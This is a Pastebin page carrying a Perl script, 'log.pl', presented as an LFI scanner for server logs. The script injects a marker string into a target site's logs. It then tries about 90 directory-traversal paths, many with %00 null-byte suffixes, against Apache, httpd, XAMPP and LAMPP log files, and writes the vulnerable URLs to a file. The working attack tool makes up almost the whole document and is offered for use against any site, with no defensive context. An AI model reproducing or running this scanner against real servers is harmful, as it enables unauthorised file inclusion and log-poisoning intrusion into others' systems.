API tools faq
paste
Advertisement
parkdream1

log.pl

parkdream1
Feb 23rd, 2012
268
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 7.84 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #
  3. # For LFI Scanner Logs - Public
  4. #
  5. # by DD3str0y3r
  6. # [email protected]
  7. #
  8. use LWP::UserAgent;
  9. use HTTP::Request;
  10.  
  11. if ($#ARGV != 1){
  12. print "==========================================================\n";
  13. print "For LFI Scanner Logs - Public\n\n";
  14. print "Use: perl $0 host path\n";
  15. print "Ex: perl $0 http://www.site.com.br /index.php?pg=\n";
  16. print "==========================================================\n";}
  17.  
  18. $site = $ARGV[0];
  19. $path = $ARGV[1];
  20.  
  21. $codigo = "/CODIGO.123";
  22. $scanner = $site.$codigo;
  23. my $request = HTTP::Request->new(GET=>$scanner);
  24. my $useragent = LWP::UserAgent->new();
  25. $useragent->timeout(5);
  26. my $resposta = $useragent->request($request);
  27. if($resposta->content !~ /CODIGO.123/)
  28. {print "\nCode can not be injected\n";}
  29. else{
  30.  
  31. @lfi = ('../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
  32. '../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00',
  33. '../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
  34. '../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00',
  35. '../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
  36. '../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
  37. '../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
  38. '../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
  39. '../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
  40. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
  41. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
  42. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
  43. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
  44. '../../../../../../../../../../../../../../../apache/logs/access.log%00',
  45. '../../../../../../../../../../../../../../../apache/logs/error.log%00',
  46. '../../../../../../../../../../../../../../../apache2/logs/error.log%00',
  47. '../../../../../../../../../../../../../../../apache2/logs/access.log%00',
  48. '../../../../../../../../../../../../../../../var/www/logs/access_log%00',
  49. '../../../../../../../../../../../../../../../var/www/logs/access.log%00',
  50. '../../../../../../../../../../../../../../../var/log/apache/access_log%00',
  51. '../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
  52. '../../../../../../../../../../../../../../../var/log/apache/access.log%00',
  53. '../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
  54. '../../../../../../../../../../../../../../../var/www/logs/error_log%00',
  55. '../../../../../../../../../../../../../../../var/www/logs/error.log%00',
  56. '../../../../../../../../../../../../../../../var/log/access_log%00',
  57. '../../../../../../../../../../../../../../../var/log/access.log%00',
  58. '../../../../../../../../../../../../../../../var/log/apache/error_log%00',
  59. '../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
  60. '../../../../../../../../../../../../../../../var/log/apache/error.log%00',
  61. '../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
  62. '../../../../../../../../../../../../../../../var/log/error_log%00',
  63. '../../../../../../../../../../../../../../../var/log/error.log%00',
  64. '../../../../../../../../../../../../../../../var/log/httpd/access_log%00',
  65. '../../../../../../../../../../../../../../../var/log/httpd/error_log%00',
  66. '../../../../../../../../../../../../../../../var/log/httpd/access.log%00',
  67. '../../../../../../../../../../../../../../../var/log/httpd/error.log%00',
  68. '../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
  69. '../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
  70. '../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
  71. '../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
  72. '../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
  73. '../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
  74. '../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
  75. '../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
  76. '../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
  77. '../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
  78. '../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
  79. '../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
  80. '../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
  81. '../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
  82. '../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
  83. '../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
  84. '../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
  85. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
  86. '../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
  87. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
  88. '../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
  89. '../../../../../../../../../../../../../../../apache/logs/access.log',
  90. '../../../../../../../../../../../../../../../apache/logs/error.log',
  91. '../../../../../../../../../../../../../../../apache2/logs/error.log',
  92. '../../../../../../../../../../../../../../../apache2/logs/access.log',
  93. '../../../../../../../../../../../../../../../var/www/logs/access_log',
  94. '../../../../../../../../../../../../../../../var/www/logs/access.log',
  95. '../../../../../../../../../../../../../../../var/log/apache/access_log',
  96. '../../../../../../../../../../../../../../../var/log/apache2/access_log',
  97. '../../../../../../../../../../../../../../../var/log/apache/access.log',
  98. '../../../../../../../../../../../../../../../var/log/apache2/access.log',
  99. '../../../../../../../../../../../../../../../var/www/logs/error_log',
  100. '../../../../../../../../../../../../../../../var/www/logs/error.log',
  101. '../../../../../../../../../../../../../../../var/log/access_log',
  102. '../../../../../../../../../../../../../../../var/log/access.log',
  103. '../../../../../../../../../../../../../../../var/log/apache/error_log',
  104. '../../../../../../../../../../../../../../../var/log/apache2/error_log',
  105. '../../../../../../../../../../../../../../../var/log/apache/error.log',
  106. '../../../../../../../../../../../../../../../var/log/apache2/error.log',
  107. '../../../../../../../../../../../../../../../var/log/error_log',
  108. '../../../../../../../../../../../../../../../var/log/error.log',
  109. '../../../../../../../../../../../../../../../var/log/httpd/access_log',
  110. '../../../../../../../../../../../../../../../var/log/httpd/error_log',
  111. '../../../../../../../../../../../../../../../var/log/httpd/access.log',
  112. '../../../../../../../../../../../../../../../var/log/httpd/error.log',
  113. '../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
  114. '../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
  115. '../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
  116. '../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
  117. '../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
  118. '../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
  119. '../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
  120. '../../../../../../../../../../../../../../../opt/xampp/logs/error.log');
  121. foreach $lfi(@lfi){
  122.  
  123. $scanner = $site.$path.$lfi;
  124. my $request = HTTP::Request->new(GET=>$scanner);
  125. my $useragent = LWP::UserAgent->new();
  126. $useragent->timeout(5);
  127. my $resposta = $useragent->request($request);
  128. if($resposta->content =~ /CODIGO.123/)
  129. {print "\a";
  130. print "\n$scanner\n";
  131. open(a, ">>vulns.txt");
  132. print a "$scanner\n";
  133. close(a);}}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!